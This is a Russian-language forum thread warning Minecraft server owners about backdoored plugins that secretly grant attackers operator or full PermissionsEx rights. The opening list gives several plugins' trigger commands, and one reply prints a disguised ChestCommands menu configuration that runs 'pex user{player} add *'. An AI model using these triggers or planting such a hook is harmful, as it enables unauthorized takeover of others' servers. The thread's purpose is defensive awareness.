Список плагинов с уязвимостями 14 марта 2018 - 21:33
Посетители, находящиеся в группе Гости, не могут оставлять комментарии.
Сергей Радонежский 17 июня 2016 - 02:23
Группа: Посетитель
Сообщений: 161
Регистрация: 17.06.2016
Прочтено: да

Описание:Некоторые плагины созданы специально для того, чтобы злоумышленник мог получить админку на сервере, на котором установлен плагин с уязвимостью. Способы получения админок очень разные и хитрые. Например: зайдя на сервер с таким плагином, злоумышленник может ударить три раза по траве каким-нибудь определённым блоком, а после этого прописать определённую команду и он автоматически становится или оператором, или получает самую главную группу в плагине PermissionsEX.Список: 1. aAntiSpam_v1.1 - способ взлома пока не известен. 2. Dupe - способ взлома пока не известен. 3. FloodProtect - Ударить по грязи три раза и прописать в чате команду /fp help 18971712 4. AntiBot - Берем рычаг в руки и нажимаем ПКМ. 5. Ural Paspport - Прописать в чате команду /passport 2 раза и нажать в инвентаре по нужным ячейкам. Скрин. 6. HypixelPets - Прописать в чате команду /nethernetwork2skingworld76 (не проверено). 7. ProtocolLibFix - Прописать команду /protocollibfix:autoworld (Не проверено). 8. RegisterFix - Появляется меню ChestCommands, кликнуть на определённый предмет в меню.

alex gamer 14 апреля 2017 - 19:58
Группа: Посетитель
Сообщений: 6
Регистрация: 14.01.2016
Прочтено: да

Появился еще один плагин с уязвимостью RegisterFix

Сергей TU154 14 апреля 2017 - 19:59
Группа: Посетитель
Сообщений: 16
Регистрация: 18.03.2017
Прочтено: да

alex gamer сказал(а):
Появился еще один плагин с уязвимостью RegisterFix
Какой способ взлома? 

alex gamer 14 апреля 2017 - 20:08
Группа: Посетитель
Сообщений: 6
Регистрация: 14.01.2016
Прочтено: да

Сергей TU154 сказал(а):
Какой способ взлома? 
Способ взлома пока что не известен, мне ее скинули чтобы я ее установил за покупку доната. Я сделал вид что установил этот плагин, и потом мне написал этот человек что я не установил ее. После этого я ему написал на проверку что плагин с уязвимостью он начал грубить и добавил в ЧС. Могу скинуть этот плагин...

alex gamer 14 апреля 2017 - 20:13
Группа: Посетитель
Сообщений: 6
Регистрация: 14.01.2016
Прочтено: да

Сергей TU154 сказал(а):
Какой способ взлома? 
Нашел способ взлома!! Это переделанный ChestCommands только menu-settings:   name: '&cВзлом опки.'   rows: 1   command:'register110011110' aa4:   COMMAND:'tell:&3Админка взломана!;console:pex user{player} add *'   NAME: '&eВзлом админки'   LORE: - ''   ID: '264'   POSITION-X: 5   POSITION-Y: 1

Сергей TU154 14 апреля 2017 - 20:18
Группа: Посетитель
Сообщений: 16
Регистрация: 18.03.2017
Прочтено: да

Добавил в список.

Nextler Play 23 августа 2017 - 15:06
Группа: Посетитель
Сообщений: 47
Регистрация: 23.08.2015
Прочтено: да

Выход из всех ситуации настолько прост. Что нужно делать чтобы не было проблем с сервером: 1. Самим собирать сборку сервера 2. Устанавливать плагины он зарубежных авторов или от наших но только проверенных 3. Доверять свой сервер проверенным людям( то есть выдать администратора или оператора)4. Никому не давать доступ к своей сборке/консоли сервера. 5. 5 раз перечитать функционал плагина перед его установкой на сервер !!

Женя Жека228 14 марта 2018 - 20:32
Группа: Посетитель
Сообщений: 2
Регистрация: 30.01.2018
Прочтено: да

Спасибо, вам за этот список хак плагинов теперь я хоть не много обезопасил свой сервер от взлома опки!

Сергей Березин 14 марта 2018 - 21:33
Группа: Администратор
Сообщений: 373
Регистрация: 19.07.2017
Прочтено: да

Женя Жека228 сказал(а): Спасибо, вам за этот список хак плагинов теперь я хоть не много обезопасил свой сервер от взлома опки!
Это ещё не весь список, есть и другие, так что будьте осторожнее.

Выбрать